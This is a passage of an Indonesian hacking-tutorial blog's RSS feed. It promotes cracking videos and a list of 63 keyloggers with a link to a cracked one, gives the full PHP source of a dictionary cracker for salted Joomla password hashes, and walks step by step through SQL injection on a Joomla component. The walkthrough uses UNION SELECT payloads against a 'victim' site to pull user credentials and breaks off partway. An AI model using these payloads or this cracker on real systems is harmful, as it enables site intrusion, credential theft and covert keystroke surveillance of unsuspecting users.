		<comments>http://www.ilmuwebsite.com/tutorial-hacking/cd-video-hacking-dan-cracking-software-gratis#comments</comments>
		<pubDate>Thu, 11 Jun 2009 10:37:57 +0000</pubDate>
		<dc:creator>Admin</dc:creator>
				<category><![CDATA[Tutorial Hacking]]></category>

		<guid isPermaLink="false"></guid>
		<description><![CDATA[Ada kalanya seseorang yang memiliki semangat menggebu-gebu dalam mempelajari network security mengalami kelelahan dalam membaca apa yang dia pelajari, karena pada dasarnya membaca membutuhkan perhatian fokus yang tertuju, dengan mengernyitkan dahi, mungkin. . Kali ini saya akan coba membawa kepada alam relaksasi anda, semakin dalam, semakin rilex. .Ya, tentunya penjabaran suatu teknik hacking maupun cracking [...]]]></description>
			<content:encoded><![CDATA[ <p><img class="caption" src="http://farisblog.com/wp-content/uploads/2009/04/screenshot1.jpg" border="0" width="210" height="158" align="left" title="CD Video Hacking dan Cracking Software Gratis tutorial hacking web desain grafis" alt="CD Video Hacking dan Cracking Software Gratis tutorial hacking web desain grafis" />Ada kalanya seseorang yang memiliki semangat menggebu-gebu dalam mempelajari network security mengalami kelelahan dalam membaca apa yang dia pelajari, karena pada dasarnya membaca membutuhkan perhatian fokus yang tertuju, dengan mengernyitkan dahi, mungkin. <img src='http://www.ilmuwebsite.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' title="CD Video Hacking dan Cracking Software Gratis tutorial hacking web desain grafis" /> . Kali ini saya akan coba membawa kepada alam relaksasi anda, semakin dalam, semakin rilex. <span id="more-624"></span> <img src='http://www.ilmuwebsite.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' title="CD Video Hacking dan Cracking Software Gratis tutorial hacking web desain grafis" /> .Ya, tentunya penjabaran suatu teknik hacking maupun cracking menggunakan video jauh lebih mudah dimengerti ketimbang harus membacanya, dan juga pastinya terdapat banyak kelemahan. <br />Seorang yang melihat video teknik hacking tentunya harus mengerti dulu konsep dari teknik hacking tersebut sebelumnya. Selain memperlihatkan teknik hacking, bagi anda yang ingin mempelajari bagaimana mengcrack suatu software untuk mendapatkan cd key, license, ataupun serial number disajikan video pembelajaran begitu lengkap. Silahkan mendownloadnya secara gratis: </p>
<p><a target="_blank" href="http://rapidshare.com/files/174700524/Cr4k.h4ck.Tut.part1.rar" target="_self">http://rapidshare.com/files/174700524/Cr4k.h4ck.Tut.part1.rar</a><br /><a target="_blank" href="http://rapidshare.com/files/174700648/Cr4k.h4ck.Tut.part2.rar" target="_self">http://rapidshare.com/files/174700648/Cr4k.h4ck.Tut.part2.rar   </a><br /><a target="_blank" href="http://rapidshare.com/files/174700526/Cr4k.h4ck.Tut.part3.rar" target="_self">http://rapidshare.com/files/174700526/Cr4k.h4ck.Tut.part3.rar </a><br /><a target="_blank" href="http://rapidshare.com/files/174700610/Cr4k.h4ck.Tut.part4.rar" target="_self">http://rapidshare.com/files/174700610/Cr4k.h4ck.Tut.part4.rar</a><br /><a target="_blank" href="http://rapidshare.com/files/174700440/Cr4k.h4ck.Tut.part5.rar" target="_self">http://rapidshare.com/files/174700440/Cr4k.h4ck.Tut.part5.rar </a><br /><a target="_blank" href="http://rapidshare.com/files/174700301/Cr4k.h4ck.Tut.part6.rar" target="_self">http://rapidshare.com/files/174700301/Cr4k.h4ck.Tut.part6.rar </a></p>
<p><span style="background-color: #009900; color: #ffff33; font-weight: bold">Segera CD Hacking v.3 @ ilmuwebsite.com</span></p>
 ]]></content:encoded>
			<wfw:commentRss>http://www.ilmuwebsite.com/tutorial-hacking/cd-video-hacking-dan-cracking-software-gratis/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Koleksi 63 Keylogger Pilihan</title>
		<link>http://www.ilmuwebsite.com/tutorial-hacking/koleksi-63-keylogger-pilihan</link>
		<comments>http://www.ilmuwebsite.com/tutorial-hacking/koleksi-63-keylogger-pilihan#comments</comments>
		<pubDate>Thu, 11 Jun 2009 03:36:51 +0000</pubDate>
		<dc:creator>Admin</dc:creator>
				<category><![CDATA[Tutorial Hacking]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[keylogger]]></category>

		<guid isPermaLink="false"></guid>
		<description><![CDATA[Bagi para lamerz maniak hacking tools pasti sering mendengar keylogger. . Apa sih keylogger ? Keylogger merupakan tools yang pada dasarnya memiliki sebuah fungsi untuk melakukan monitoring semua akitivitas yang dilakukan oleh user pada sebuah PC. Mulai dari merekam password yang diketikan, chatting di instant messaging, program apa saja yang dijalankan oleh user, apa yang [...]]]></description>
			<content:encoded><![CDATA[ <p><img class="caption" src="http://www.unair.info/ilmuwebsite/hack/keyboard.jpeg" border="0" alt=" Koleksi 63 Keylogger Pilihan tutorial hacking web desain grafis" align="left" title=" Koleksi 63 Keylogger Pilihan tutorial hacking web desain grafis" />Bagi para lamerz maniak hacking tools pasti sering mendengar keylogger. <img src='http://www.ilmuwebsite.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' title=" Koleksi 63 Keylogger Pilihan tutorial hacking web desain grafis" /> . Apa sih keylogger ? Keylogger merupakan tools yang pada dasarnya memiliki sebuah fungsi untuk melakukan monitoring semua akitivitas yang dilakukan oleh user pada sebuah PC. Mulai dari merekam password yang diketikan, chatting di instant messaging, program apa saja yang dijalankan oleh user, apa yang dilakukan user pada program tersebut, dan semua yang diketikkan di keyboard hingga pergerakan mouse, bahkan beberapa keylogger yang telah lama beredar mengincludekan fasilitas pengcapture layar monitor setiap 5 menit sekali, dan outputnya adalah HTML.</p>
<p><span id="more-623"></span></p>
<p>Ada beberapa keylogger yang cukup menarik, diantaranya ada yang dapat mengirim hasil dari monitoring aktivitas tersebut ke email sang penanam keylogger tersebut. Sehingga si penanam keylogger tersebut dapat melihat semua aktivitas yang dilakukan oleh user pada sebuah pc melalui email.<br />
Jelas keylogger ini bersifat kontroversial seperti 2 mata pisau, positif, negatif, membangun dan menghancurkan. Tidak cukup waktu untuk mendiskusikan semua hal tersebut.<br />
Untuk menambah koleksi hacking tools anda, <img src='http://www.ilmuwebsite.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' title=" Koleksi 63 Keylogger Pilihan tutorial hacking web desain grafis" />  silahkan unduh 63 keylogger terbaru  yang cukup handal &#8230;</p>
<p><span style="font-weight: bold">Berikut daftarnya : </span><br />
1. 007 Keylogger Spy Software 3.873<br />
2. Active Key Logger 2.4<br />
3. Activity Keylogger 1.80.21<br />
4. Activity Logger 3.7.2132<br />
5. ActMon Computer Monitoring 5.20<br />
6. Actual Spy 2.8<br />
7. Advanced Invisible Keylogger v1.9<br />
8. Advanced Keylogger 1.8<br />
9. Ardamax Keylogger 2.9<br />
10. BlazingTools Perfect Keylogger 1.68<br />
11. Blazingtools Remote Logger v2.3<br />
12. Data Doctor KeyLogger Advance v3.0.1.5<br />
13. Local Keylogger Pro 3.1<br />
14. ExploreAnywhere Keylogger Pro 1.7.8<br />
15. Family Cyber Alert 4.06<br />
16. Family Keylogger 2.80<br />
17. Firewall bypass Keylogger 1.5<br />
18. Free Keylogger 2.53<br />
19. Ghost Keylogger 3.80<br />
20. Golden Eye 4.5<br />
21. Golden KeyLogger 1.32<br />
22. Handy Keylogger 3.24 build 032<br />
23. Home Keylogger 1.77<br />
24. Inside Keylogger 4.1<br />
25. iOpus Starr PC and Internet Monitor 3.23<br />
26. iSpyNow v2.0<br />
27. KeyScrambler 1.3.2<br />
28. Keystroke Spy 1.10<br />
29. KGB Keylogger 4.2<br />
30. KGB Spy 3.84<br />
31. LastBit Absolute Key Logger 2.5.283<br />
32. Metakodix Stealth Keylogger 1.1.0<br />
33. Network Event Viewer v6.0.0.42<br />
34. OverSpy v2.5<br />
35. PC Activity Monitor Professional 7.6.3<br />
36. PC Spy Keylogger 2.3 build 0313<br />
37. PC Weasel 2.5<br />
38. Personal PC Spy v1.9.5<br />
39. Power Spy 6.10<br />
40. Powered Keylogger v2.2.1.1920<br />
41. Quick Keylogger 2.1<br />
42. Radar 1.0<br />
43. Real Spy Monitor 2.80<br />
44. Real Spy Monitor 2.80<br />
45. Remote Desktop Spy 4.04<br />
46. Remote KeyLogger 1.0.1<br />
47. Revealer Keylogger Free 1.33<br />
48. SC Keylogger Pro 3.2<br />
49. Smart Keystroke Recorder Pro<br />
50. Spector Pro 6.0.1201<br />
51. SpyAnytime PC Spy 2.42<br />
52. SpyBuddy 3.7.5<br />
53. Spytech SpyAgent 6.02.07<br />
54. Spytector 1.3.5<br />
55 Stealth Key Logger 4.5<br />
56. System keylogger 2.0.0<br />
57. Tim’s Keylogger 1.0<br />
58. Tiny Keylogger 2.0<br />
59. Total Spy 2.7<br />
60. Windows Keylogger 5.04<br />
61. Win-Spy Pro 8.9.109<br />
62. XP Advanced Keylogger 2.5<br />
63. XPCSpy Pro version 3.01</p>
<p>Mohon maaf, sementara link 63 keylogger di suspend terlebih dahulu, sampai kami upload ulang semua keyloggernya ke server local, sebagai gantinya silahkan mencoba keylogger yang tidak kalah powerfull <a target="_blank" href="http://hotfile.com/dl/91905/3eb88a2/Beyond.Keylogger.v3.1.Multilenguaje.Incl.KeyMaker.and.Patch-DVT.rar.html" rel="nofollow">http://hotfile.com/dl/91905/3eb88a2/Beyond.Keylogger.v3.1.Multilenguaje.Incl.KeyMaker.and.Patch-DVT.rar.html</a><a target="_blank" href="http://rapidshare.com/files/312676359/63_Keyloggers.rar"></a></p>
 ]]></content:encoded>
			<wfw:commentRss>http://www.ilmuwebsite.com/tutorial-hacking/koleksi-63-keylogger-pilihan/feed</wfw:commentRss>
		<slash:comments>8</slash:comments>
		</item>
		<item>
		<title>Konsep sederhana Joomla Password Cracker</title>
		<link>http://www.ilmuwebsite.com/tutorial-hacking/konsep-sederhana-joomla-password-cracker</link>
		<comments>http://www.ilmuwebsite.com/tutorial-hacking/konsep-sederhana-joomla-password-cracker#comments</comments>
		<pubDate>Thu, 11 Jun 2009 10:33:16 +0000</pubDate>
		<dc:creator>Admin</dc:creator>
				<category><![CDATA[Tutorial Hacking]]></category>

		<guid isPermaLink="false"></guid>
		<description><![CDATA[Apa yang akan penulis jelaskan disini, begitu juga dengan apa yang telah penulis jelaskan pada tutorial sebelum-sebelumnya, mengenai hacking tentunya, di ibaratkan seperti pisau yang memiliki 2 sisi tajam, di satu sisi seorang admin web dapat menjaga ketat sitenya dengan aman, namun patut diketahui pula tidak ada sistem yang memiliki keamanan 100%, selalu saja ada [...]]]></description>
			<content:encoded><![CDATA[ <p><img class="caption" src="http://www.unair.info/ilmuwebsite/hack/jomla2/joomla.jpg" border="0" width="250" height="77" align="left" title="Konsep sederhana Joomla Password Cracker tutorial hacking web desain grafis" alt="Konsep sederhana Joomla Password Cracker tutorial hacking web desain grafis" />Apa yang akan penulis jelaskan disini, begitu juga dengan apa yang telah penulis jelaskan pada tutorial sebelum-sebelumnya, mengenai hacking tentunya, di ibaratkan seperti pisau yang memiliki 2 sisi tajam, di satu sisi seorang admin web dapat menjaga ketat sitenya dengan aman, namun patut diketahui pula tidak ada sistem yang memiliki keamanan 100%, selalu saja ada bolong yang masih dapat di eksploitasi,<span id="more-622"></span>tapi setidaknya dapat meminimalisir serangan yang ada, dan di sisi lain yang akan penulis terangkan nanti tentunya cenderung digunakan untuk kegiatan vandalisme/merusak oleh beberapa pihak. Ya, tidak heran jika teori tesis dan anti tesis kerapkali hadir dalam dunia perhackingan ini. Di satu sisi membangun tapi di sisi lain menghancurkan. Lantas yang harus di lakukan sekarang adalah, tetap waspada pada security risk yang ada, dan ketahuilah tamu tak diundang selalu menyempatkan waktunya untuk hadir memonitoring site anda, jika anda melakukan sedikit saja salah langkah akibatnya cukup fatal. </p>
<p>Waha&#8230; sepertinya intro tutorial harus dipisahkan sendiri dalam tutorial yang berbeda, jari penulis begitu asik menari-nari di atas tuts keyboard sampai-sampai lupa pada pokok pembahasan. <img src='http://www.ilmuwebsite.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' title="Konsep sederhana Joomla Password Cracker tutorial hacking web desain grafis" /> . </p>
<p>Ya, berdasarkan artikel sebelumnya, betapa mudahnya seorang attacker mendapatkan username dan password sang administrator pada content management system seperti joomla, tapi masih terdapat satu masalah,  dimana seorang attacker masih belum dapat melakukan eksploitasi lebih lanjut, dikarenakan password yang didapatkan itu masih dalam bentuk password yang terenkripsi, sehingga butuh perlakuan khusus lebih lanjut untuk mendapatkan password yang sesungguhnya. Di sinilah penulis akan mencoba menjelaskan sebuah konsep sederhana bagaimana mendapatkan suatu password asli yang terenkripsi, namun penulis hanya membatasi cracking password pada satu jenis hash saja, yaitu joomla hash password. Penjelasan yang akan penulis lakukan bukanlah mencoba membuat algoritma dekripsi password tetapi hanyalah penggunaan metode dictionary file, dimana untuk mendapatkan password asli cukup dilakukan pencocokan password dengan kamus data yang ada sehingga menghasilkan password yang sebenarnya. <img src='http://www.ilmuwebsite.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' title="Konsep sederhana Joomla Password Cracker tutorial hacking web desain grafis" /> . Namun setiap aplikasi selalu saja memiliki kekurangan, penulis tidak menafikan hal itu. Karena kesempurnaan hanyalah milik sang Pencipta. <img src='http://www.ilmuwebsite.com/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' title="Konsep sederhana Joomla Password Cracker tutorial hacking web desain grafis" />  Kekurangannya adalah resource memori yang di butuhkan untuk metode seperti ini cenderung lebih besar dari ukuran biasanya. </p>
<p>Berikut adalah source code lengkap &#8216;simple joomla password cracker&#8217; : </p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;// cut here </p>
<p>&lt;HTML&gt;<br />&lt;HEAD&gt;<br />&lt;BASEFONT SIZE=3&gt;<br />&lt;TITLE&gt;::: Joomla Password Cracker :::&lt;/TITLE&gt;</p>
<p>&lt;/HEAD&gt;</p>
<p>&lt;BODY BGCOLOR=#000000 vlink=#0000FF&gt;</p>
<p>&lt;center&gt;<br />&lt;p align=&#8221;center&#8221;&gt;&lt;font face=&#8221;Verdana&#8221; size=&#8221;1&#8243;&gt;&lt;BR&gt;<br />&lt;/B&gt;&lt;BR&gt;<br />  &lt;/font&gt;&lt;/p&gt;<br />&lt;p align=&#8221;center&#8221;&gt;&nbsp;&lt;/p&gt;<br />&lt;p align=&#8221;center&#8221;&gt;&nbsp;&lt;/p&gt;<br />&lt;TABLE BORDER=0 WIDTH=500 CELLPADDING=3 CELLSPACING=0&gt;<br />&lt;tr&gt;&lt;td&gt;&nbsp;&lt;p align=&#8221;center&#8221; style=&#8221;margin-top: 0&#8243;&gt;&lt;font color=&#8221;#FFFFFF&#8221; face=&#8221;Verdana&#8221; size=&#8221;2&#8243;&gt;&lt;u&gt;&lt;font size=&#8221;4&#8243;&gt;Simple&lt;/font&gt;&lt;/u&gt;<br />&lt;/font&gt;&lt;font size=&#8221;4&#8243;&gt;&lt;u&gt;&lt;font face=&#8221;Verdana&#8221; color=&#8221;#00FF00&#8243;&gt;&lt;strong&gt;Joomla&lt;/strong&gt;&lt;/font&gt; &lt;font color=&#8221;#FFFFFF&#8221; face=&#8221;Verdana&#8221;&gt;Password Cracker&lt;/font&gt;&lt;/u&gt;&lt;/font&gt;&lt;font size=&#8221;2&#8243;&gt;&lt;font color=&#8221;#FFFFFF&#8221; face=&#8221;Verdana&#8221;&gt;&lt;br&gt;<br />&lt;font color=&#8221;#00FF00&#8243;&gt;Developed by&lt;strong&gt; : ilmuwebsite.com &lt;/strong&gt;&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/p&gt;<br />    &lt;/td&gt;<br />&lt;/tr&gt;<br />&lt;/table&gt;<br />&lt;!&#8211;  Demonstration &#8211;&gt;<br />&lt;BODY&gt;<br />&lt;center&gt;<br />  &lt;form action=index.php method=&#8221;POST&#8221;&gt;&lt;p&gt;<br />    &lt;P&gt;<br />&lt;b&gt;<br />&lt;font size=&#8221;2&#8243; face=&#8221;Verdana&#8221; color=&#8221;#FFFFFF&#8221;&gt;&lt;u&gt;Masukkan  &lt;/u&gt;&lt;/font&gt;&lt;/b&gt;&lt;u&gt;&lt;font size=&#8221;2&#8243; face=&#8221;Verdana&#8221; color=&#8221;#FFFFFF&#8221;&gt;password hashnya disini :&lt;/font&gt;&lt;/u&gt;&lt;font size=&#8221;2&#8243; face=&#8221;Verdana&#8221; color=&#8221;#FFFFFF&#8221;&gt;&lt;/font&gt;&lt;font color=&#8221;#00FF00&#8243; size=&#8221;1&#8243; face=&#8221;Verdana&#8221;&gt;&lt;br&gt;<br />&lt;BR&gt;<br />&lt;input type=&#8221;text&#8221; name=&#8221;hash&#8221; size=55 style=&#8221;font-family: Verdana; font-size: 8pt; color: #00FF00; border: 1px solid #00FF00; background-color: #000000&#8243;&gt;<br />&lt;input type=&#8221;submit&#8221; name=&#8221;send&#8221; value=&#8221;Cari !!!&#8221; style=&#8221;font-family: Verdana; font-size: 8pt; color: #00FF00; border: 1px solid #00FF00; background-color: #000000&#8243;&gt;<br />&lt;/font&gt;<br />&lt;P&gt;&lt;br&gt;</p>
<p>&lt;/form&gt;<br />  <br />&lt;?php<br />$hashes=array();<br />$i=0;<br />$parts=explode(&#8220;:&#8221;,$_POST['hash']); <br />$hashes[$i][0]=$parts[0];   <br />$hashes[$i][1]=$parts[1];</p>
<p>if (ISSET($_POST['hash']))<br />{<br />$str = &#8221; &#8220;;<br />echo &#8220;&lt;font size=2 face=Verdana color=#FFFFFF&gt;&lt;u&gt;Started: &lt;/u&gt;&#8221;;<br />echo date(&#8220;F j, Y, g:i:s a&#8221;);</p>
<p>$lines = file(&#8216;kamus2.txt&#8217;);</p>
<p>foreach ($lines as $line_num =&gt; $line) <br />{<br />check($line); <br />}</p>
<p>$lines = file(&#8216;kamus1.txt&#8217;);</p>
<p>foreach ($lines as $line_num =&gt; $line) <br />{<br />check($line);<br />}</p>
<p>echo &#8220;&lt;br&gt;&lt;font size=2 face=Verdana color=#FFFFFF&gt;&lt;u&gt;Finished : &lt;/u&gt;&#8221;;<br />echo date(&#8220;F j, Y, g:i:s a&#8221;);</p>
<p>}</p>
<p>function check($a)<br />{     <br />global  $i;<br />$a=rtrim($a) ;</p>
<p>for($x=0;$x&lt;=$i;$x++)<br />{<br />global  $hashes;</p>
<p>if (md5($a.$hashes[$x][1]) === $hashes[$x][0])<br />{ <br />echo &#8220;&lt;font size=2 face=Verdana color=#FFFFFF&gt;&lt;br&gt;&lt;br&gt;&lt;u&gt;The password is : &lt;/u&gt;&lt;/font&gt;&lt;font size=2 face=Verdana color=#00FF00&gt;&lt;h1&gt;$a&lt;/h1&gt;&lt;/font&gt;&#8221;; <br />echo &#8220;&lt;u&gt;Ended: &lt;/u&gt;&#8221;;<br />echo date(&#8220;F j, Y, g:i:s a&#8221;);<br />}</p>
<p>}<br />          <br />}<br />?&gt;<br />&lt;font size=&#8221;2&#8243; face=&#8221;Verdana&#8221; color=&#8221;#FFFFFF&#8221;&gt;&lt;u&gt;&lt;br&gt;&lt;br&gt;Tolong di kembangkan ya ?! <img src='http://www.ilmuwebsite.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' title="Konsep sederhana Joomla Password Cracker tutorial hacking web desain grafis" />  &lt;/u&gt;&lt;/font&gt;<br />&lt;/center&gt;<br />&lt;/body&gt;&lt;/html&gt;</p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;// cut here </p>
<p>Untuk menjalankan script ini di localhost anda perlu merubah konfigurasi php.ini, yaitu dengan mengganti baris ini : <br />memory_limit = 32M ;</p>
<p><img src="http://www.unair.info/ilmuwebsite/hack/jomla2/memorilimit.jpg" border="0" title="Konsep sederhana Joomla Password Cracker tutorial hacking web desain grafis" alt="Konsep sederhana Joomla Password Cracker tutorial hacking web desain grafis" /></p>
<p>menjadi &gt; 32, penulis menggantinya menjadi :<br />memory_limit = 256M ;</p>
<p>Ya, sebelum berlanjut, penulis akan membahas struktur password joomla yang terenkripsi terlebih dahulu, enkripsi password joomla biasanya terdiri dari hash dan salt.  Standar enkripsi joomla biasanya berbentuk seperti ini :</p>
<p>b51498faae03f7cf533e3ed97fc00116:9VrQpQzdNQHhtieK</p>
<p>Hashnya itu terdapat pada bagian yang pertama yaitu b51498faae03f7cf533e3ed97fc00116, dan saltnya itu ada di bagian akhir 9VrQpQzdNQHhtieK, keduanya terlihat di pisahkan dengan titik dua &#8220;:&#8221;. Salt bagi seorang attacker berfungsi untuk membantu dalam pencarian password sesungguhnya. <br />Yang ditemukan disini adalah jika password berbentuk plain text di gabung dengan saltnya maka akan menghasilkan hash password joomla. Dengan kata lain jika : x + salt = hash joomla. Sehingga jika di implementasikan melalui enkripsi md5 : </p>
<p>md5(x + salt) = hash  </p>
<p>maka :</p>
<p>md5(x + 9VrQpQzdNQHhtieK) = b51498faae03f7cf533e3ed97fc00116</p>
<p>berapakah x ? ( pak Mamat guru matematika di SMAN 4 Bogor kayanya tau. <img src='http://www.ilmuwebsite.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' title="Konsep sederhana Joomla Password Cracker tutorial hacking web desain grafis" />  huehuehuehehe&#8230;  )</p>
<p>Ya seperti pada baris kalimat ini : </p>
<p>&#8230;<br />if (md5($a.$hashes[$x][1]) === $hashes[$x][0])<br />{ <br />echo &#8220;&lt;font size=2 face=Verdana color=#FFFFFF&gt;&lt;br&gt;&lt;br&gt;&lt;u&gt;The password is : &lt;/u&gt;&lt;/font&gt;&lt;font size=2 face=Verdana color=#00FF00&gt;&lt;h1&gt;$a&lt;/h1&gt;&lt;/font&gt;&#8221;; <br />&#8230;</p>
<p>Dan hasilnya adalah &#8230;<br /><img src="http://www.unair.info/ilmuwebsite/hack/jomla2/result.jpg" border="0" title="Konsep sederhana Joomla Password Cracker tutorial hacking web desain grafis" alt="Konsep sederhana Joomla Password Cracker tutorial hacking web desain grafis" /></p>
<p> <img src='http://www.ilmuwebsite.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' title="Konsep sederhana Joomla Password Cracker tutorial hacking web desain grafis" /> ~~</p>
<p>Penulis yakin anda cukup familiar dengan source di atasnya. Dan algoritmanya pun cukup mudah. Script lengkap dan kamus passwordnya dapat <a target="_blank" href="http://www.unair.info/ilmuwebsite/hack/jomla2/brute.zip" target="_self">di download di sini</a> &#8230; <br />Selamat mencoba. Selamat mengembangkan ! <img src='http://www.ilmuwebsite.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' title="Konsep sederhana Joomla Password Cracker tutorial hacking web desain grafis" /> </p>
<p>Greetz for : b_scorpio, peterpanz, abuzahra, phii_, nazwa, jojo, ivan, fadli, safril, dr.emi, husniearif, [H], dan ilmuwebsite community.</p>
 ]]></content:encoded>
			<wfw:commentRss>http://www.ilmuwebsite.com/tutorial-hacking/konsep-sederhana-joomla-password-cracker/feed</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>Implementasi SQL Injection pada Joomla</title>
		<link>http://www.ilmuwebsite.com/tutorial-hacking/implementasi-sql-injection-pada-joomla</link>
		<comments>http://www.ilmuwebsite.com/tutorial-hacking/implementasi-sql-injection-pada-joomla#comments</comments>
		<pubDate>Thu, 11 Jun 2009 10:32:20 +0000</pubDate>
		<dc:creator>Admin</dc:creator>
				<category><![CDATA[Tutorial Hacking]]></category>

		<guid isPermaLink="false"></guid>
		<description><![CDATA[Apa jadinya jika admin malas mengupdate webnya? Apa jadinya jika admin tidak memperhatikan security risk yang ada? Apa jadinya jika &#8216;the choosen one&#8217; ternyata seorang admin yang tidak tahu sama sekali mengenai system keamanan sebuah data? Ironi memang. Bahkan terkadang ada admin yang meremehkan system keamanan. Apa jadinya jika server anda memiliki konfigurasi default? Apa [...]]]></description>
			<content:encoded><![CDATA[ <p><img class="caption" src="http://www.unair.info/ilmuwebsite/hack/joomla/joomla.jpg" border="0" width="237" height="93" align="left" title="Implementasi SQL Injection pada Joomla tutorial hacking web desain grafis" alt="Implementasi SQL Injection pada Joomla tutorial hacking web desain grafis" />Apa jadinya jika admin malas mengupdate webnya? Apa jadinya jika admin tidak memperhatikan security risk yang ada? Apa jadinya jika &#8216;the choosen one&#8217; ternyata seorang admin yang tidak tahu sama sekali mengenai system keamanan sebuah data? Ironi memang. Bahkan terkadang ada admin yang meremehkan system keamanan. Apa jadinya jika server anda memiliki konfigurasi default? Apa jadinya, apa jadinya? Dan segudang akibat dari hasil penggabungan dua kata tersebut. Yang terjadi adalah peluang seorang attacker untuk <span id="more-621"></span>menyusup ke dalam website anda semakin  memungkinkan, mengobrak-abrik server anda, bahkan tidak jarang seorang attacker mengambil profit dari exploitasi system yang ada. Dalam berbagai hal, termasuk mendulang dollar dengan cara tidak halal. Seperti yang dilakukan oleh para carder. </p>
<p>Penulis akan menjelaskan betapa mudahnya sebuah web dieksploitasi hanya dengan bermodalkan internet dan browser internet tentunya, dan sedikit pengetahuan sql query. Perlu penulis jelaskan, penulis hanyalah seorang manusia biasa yang memiliki pengetahuan minimal dari sistem keamanan data. </p>
<p>Ya, belum lama ini, salah satu component joomla terbukti mengidap penyakit berbahaya, tumor ganas yang akan menjalar keseluruh tubuh, dan berakibat kematian pada akhirnya. <img src='http://www.ilmuwebsite.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' title="Implementasi SQL Injection pada Joomla tutorial hacking web desain grafis" /> ~~ </p>
<p>Telah ditemukan bug sql injection pada com_ds-syndicate, ini adalah salah satu contoh dari sekian banyak bug fatal yang terdapat dalam joomla. Waspadalah! Kesalahan terjadi karena komponen ini tidak menyediakan filtering sql yang ketat dalam variable feed_id. Penyusupan dapat dilakukan, sederhananya ini terjadi karena kesalahan dari variable feed_id. Dan saat menulis artikel ini ada beberapa site masih memiliki kecacatan seperti ini.  </p>
<p>Ya, Langsung aja &#8230; </p>
<p>http:// korban.com/index2.php?option=ds-syndicate&#038;version=1&#038;feed_id=1</p>
<p><img src="http://www.unair.info/ilmuwebsite/hack/joomla/feed.JPG" border="0" title="Implementasi SQL Injection pada Joomla tutorial hacking web desain grafis" alt="Implementasi SQL Injection pada Joomla tutorial hacking web desain grafis" /><br />Url ini menampilkan feeds seperti biasanya, tapi beda halnya jika kita tes kelemahannya, dengan penambahan tanda kutip ( &#8216; ) di belakangnya. </p>
<p>http:// korban.com/index2.php?option=ds-syndicate&#038;version=1&#038;feed_id=1&#8242;</p>
<p><img src="http://www.unair.info/ilmuwebsite/hack/joomla/errror.JPG" border="0" title="Implementasi SQL Injection pada Joomla tutorial hacking web desain grafis" alt="Implementasi SQL Injection pada Joomla tutorial hacking web desain grafis" /><br />Apa yang terjadi ? &#8230; error&#8230;</p>
<p>Langkah selanjutnya adalah cari urutan  si table &#8216;dssyndicate_feeds&#8217;  dengan mendapatkan bentuk error yang sama, dan berhenti ketika mendapatkan error yang berbeda  : </p>
<p>index2.php?option=ds-syndicate&#038;version=1&#038;feed_id=1+order+by+1/*    &#8211;&gt;    errornya sama <br />index2.php?option=ds-syndicate&#038;version=1&#038;feed_id=1+order+by+2/*    &#8211;&gt;    errornya sama <br />index2.php?option=ds-syndicate&#038;version=1&#038;feed_id=1+order+by+3/*    &#8211;&gt;    errornya sama<br />index2.php?option=ds-syndicate&#038;version=1&#038;feed_id=1+order+by+4/*    &#8211;&gt;    errornya sama <br />index2.php?option=ds-syndicate&#038;version=1&#038;feed_id=1+order+by+20/*    &#8211;&gt;    errornya sama <br />…<br />index2.php?option=ds-syndicate&#038;version=1&#038;feed_id=1+order+by+21/*    &#8211;&gt;    errornya berbeda</p>
<p>perhatikan bentuk error-nya berbeda ketika feed_id yang diisi dengan 1+order+by+21/*, ini adalah patokan untuk melakukan injeksi sql yang selanjutnya. </p>
<p>Langkah selanjutnya adalah penggunaan union, lebih jelasnya mengenai fungsi union, silahkan baca di sini. </p>
<p>Selanjutnya kita test, apakah fungsi union dapat berjalan pada url korban. <br />index2.php?option=ds-syndicate&#038;version=1&#038;feed_id=1+union+all+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,<br />15,16,17,18,19,20+from+wc_users</p>
<p>lihat paling akhir dari baris tersebut, <br />from+wc_users</p>
<p>wc_users adalah nama table yang diambil dari struktur database joomla. Berisi mengenai informasi login user. <br />Sedangkan 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ini  diperoleh berdasarkan yang telah penulis jelaskan sebelumnya. </p>
<p>Ya setelah url di atas di enter, yang perlu dilakukan adalah mendownload file tersebut, <br /><img src="http://www.unair.info/ilmuwebsite/hack/joomla/download.jpg" border="0" title="Implementasi SQL Injection pada Joomla tutorial hacking web desain grafis" alt="Implementasi SQL Injection pada Joomla tutorial hacking web desain grafis" /></p>
<p>Setelah itu buka file yang baru didownload tersebut dengan editor seperti notepad, walaupun filenya xml, tapi penulis tetap menyarankan untuk membukanya dengan notepad, tidak dengan browser internet, karena memudahkan untuk pembacaan hasil dari sql injection yang telah dilakukan. </p>
<p><img src="http://www.unair.info/ilmuwebsite/hack/joomla/angka2.jpg" border="0" title="Implementasi SQL Injection pada Joomla tutorial hacking web desain grafis" alt="Implementasi SQL Injection pada Joomla tutorial hacking web desain grafis" /><br />Lihat angka 2 di dalam tag &lt;title&gt; : </p>
<p>&lt;title&gt;2 (18)&lt;/title&gt;</p>
